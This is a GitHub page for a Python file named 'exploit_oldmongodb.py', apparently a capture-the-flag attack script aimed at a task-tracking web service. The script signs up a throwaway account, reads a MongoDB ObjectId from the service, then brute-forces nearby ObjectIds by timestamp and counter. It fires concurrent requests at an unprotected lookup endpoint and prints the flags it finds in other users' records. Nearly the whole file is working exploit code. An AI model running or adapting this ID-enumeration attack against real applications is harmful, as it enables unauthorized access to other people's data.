-
Notifications
You must be signed in to change notification settings - Fork 1
/
exploit_oldmongodb.py
88 lines (80 loc) · 2.91 KB
/
exploit_oldmongodb.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
#!/Library/Frameworks/Python.framework/Versions/3.8/bin/python3
#made by fargate
#FARGATETOP
from user_agent import generate_user_agent
import requests as rq
import random
import string
import re
import json
import sys
import grequests
url = "http://{}:31337".format("6.6.7.2")
crrfRegEx = r"hidden\" value=\"([\w\.\-]+)"
proxies = {
"http": "http://127.0.0.1:8080",
}
sys.tracebacklimit = 0
def do_something(response, *args, **kwargs):
if "result" in response.text:
tmp = json.loads(response.text)
res = re.findall(r"[A-Z0-9]{21}[A-F0-9]{10}=", tmp["result"]["Flag"])
for flag in res:
print(flag, flush=True)
def getrandom(N):
return "".join([random.choice(string.ascii_letters) for i in range(N)])
def signup():
s = rq.Session()
# s.proxies = proxies
s.headers["User-Agent"] = "python-requests/2.20.1"
s.headers["Accept"] = "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8"
s.headers["Accept-Language"] = "en-US,en;q=0.5"
s.headers["Accept-Encoding"] = "gzip, deflate"
s.headers["Content-Type"] = "application/x-www-form-urlencoded"
user = getrandom(10)
password = user
res = s.get(url+"/signup").text
try:
resCSRF = re.findall(crrfRegEx, res)[0]
except:
exit(0)
burp0_data = {"firstname": user,
"lastname": user,
"username": user,
"password": user,
"email": getrandom(10)+"@"+getrandom(5)+"."+getrandom(2),
"csrf_token": resCSRF,
"submit": "Sign Up"}
res = s.post(url+"/signup", data=burp0_data, allow_redirects=False).text
return s,user,password,resCSRF
def singin(s,user,password,resCSRF, allow=False):
burp0_data = {"username": user,
"password": password,
"csrf_token": resCSRF,
"submit": "Sign In"}
res = s.post(url+"/signin",data=burp0_data, allow_redirects=allow)
def main():
s,user,password,resCSRF = signup()
singin(s,user,password,resCSRF)
res = s.get(url+"/task_viewer").text
resFind = re.findall(r"item\" id=\"(\w{24})\"",res)
tmpId = resFind[0]
zzzz = getrandom(6)
burp0_data = {"id": tmpId, "Name": zzzz, "Description": "sdf", "Flag": "sdf", "Category": "Web", "Category_full": "Web", "Project": zzzz}
res3 = s.get(url+"/project_selection?project="+zzzz).text
res2 = s.post(url+"/save_task", data=burp0_data).text
res3 = s.get(url+"/project_selection?project="+zzzz).text
_id = json.loads(res3)["result"][0]["_id"]
timeUnix,machineId,IdProcess,Counter = _id[:8],_id[8:14],_id[14:18],_id[18:24]
timeUnix = int(timeUnix,16)
Counter = int(Counter,16)
urls = []
for sec in range(timeUnix, timeUnix-180, -1):
for tmpId in range(Counter, Counter-100, -1):
idInfo = hex(sec)[2:]+machineId+IdProcess+hex(tmpId)[2:]
tmpUrl = url+"/get_info?id={}".format(idInfo)
urls.append(tmpUrl)
rs = (grequests.get(u, hooks = {'response' : do_something}) for u in urls)
resMap = grequests.map(rs)
if __name__ == "__main__":
main()